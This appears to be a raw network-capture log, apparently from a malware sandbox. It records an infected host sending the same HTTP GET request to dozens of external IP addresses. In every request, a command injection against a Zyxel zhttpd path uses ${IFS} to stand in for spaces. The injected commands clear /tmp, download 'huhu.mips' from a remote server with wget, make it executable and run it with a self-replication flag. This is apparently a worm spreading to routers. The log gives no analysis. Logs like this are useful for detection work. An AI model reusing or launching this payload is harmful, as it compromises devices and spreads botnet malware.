                                                      Feb 2, 2024 06:36:04.887227058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7265192.168.2.1438310134.81.157.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887257099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7266192.168.2.1439404105.107.82.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887314081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7267192.168.2.1455166223.140.111.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887341976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7268192.168.2.145498020.126.124.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887402058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7269192.168.2.143890044.216.154.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887427092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7270192.168.2.1442756176.142.248.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887454987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7271192.168.2.1433032119.214.215.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887500048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7272192.168.2.1454080132.255.114.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887537956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7273192.168.2.1458690160.222.164.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887589931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7274192.168.2.145321418.20.27.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887639999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7275192.168.2.144075665.88.182.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887660027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7276192.168.2.1450048105.15.216.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887689114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7277192.168.2.1436126105.167.142.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887723923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7278192.168.2.1444200142.202.0.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887769938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7279192.168.2.145322250.7.229.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887803078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7280192.168.2.1455132141.248.70.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887866020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7281192.168.2.143526275.88.244.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887922049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7282192.168.2.144149284.104.177.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.887965918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7283192.168.2.144047019.190.85.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888019085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7284192.168.2.144925490.247.18.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888057947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7285192.168.2.1450174191.142.49.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888092995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7286192.168.2.145873436.141.240.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888130903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7287192.168.2.1438804211.107.11.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888168097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7288192.168.2.1440232111.51.237.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888204098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7289192.168.2.1459070185.179.179.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888254881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7290192.168.2.1453076105.198.248.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888309956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7291192.168.2.145962281.220.102.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888359070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7292192.168.2.145532059.122.27.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888398886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7293192.168.2.144000473.51.53.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888432980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7294192.168.2.144245477.12.247.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888493061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7295192.168.2.1442130128.114.78.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888515949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7296192.168.2.1452878168.233.54.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888544083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7297192.168.2.144452854.214.83.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888572931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7298192.168.2.1448796181.80.245.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888629913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7299192.168.2.1445582149.33.71.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888684988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7300192.168.2.1439912176.142.233.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888703108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7301192.168.2.1434162185.68.199.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888736010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7302192.168.2.1434828100.203.16.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888786077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7303192.168.2.1450518188.205.155.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888824940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7304192.168.2.1437672102.11.234.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888894081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7305192.168.2.1441498103.10.239.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888920069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7306192.168.2.1441620171.46.120.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888947964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7307192.168.2.1443662184.21.108.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.888973951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7308192.168.2.144810444.65.196.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889008999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7309192.168.2.1446162182.131.223.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889035940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7310192.168.2.1433922168.1.163.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889086962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7311192.168.2.1449616128.233.16.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889103889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7312192.168.2.1454646163.251.235.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889148951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7313192.168.2.1453548118.103.43.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889208078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7314192.168.2.146071485.173.124.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889231920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7315192.168.2.1452880203.59.94.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889270067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7316192.168.2.143690217.37.101.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889306068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7317192.168.2.1439004164.43.166.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889369011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7318192.168.2.1441686155.60.216.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889416933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7319192.168.2.145270242.20.3.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889441967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7320192.168.2.1450186210.169.101.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889493942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7321192.168.2.145285838.146.145.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889548063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7322192.168.2.1459092147.79.99.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889595985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7323192.168.2.1449698118.82.172.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889631987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7324192.168.2.1457876210.80.27.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889691114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7325192.168.2.145186291.55.22.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889719963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7326192.168.2.1439566154.170.182.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889753103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7327192.168.2.1433338216.147.215.34443
                                                      TimestampBytes transferredDirectionData
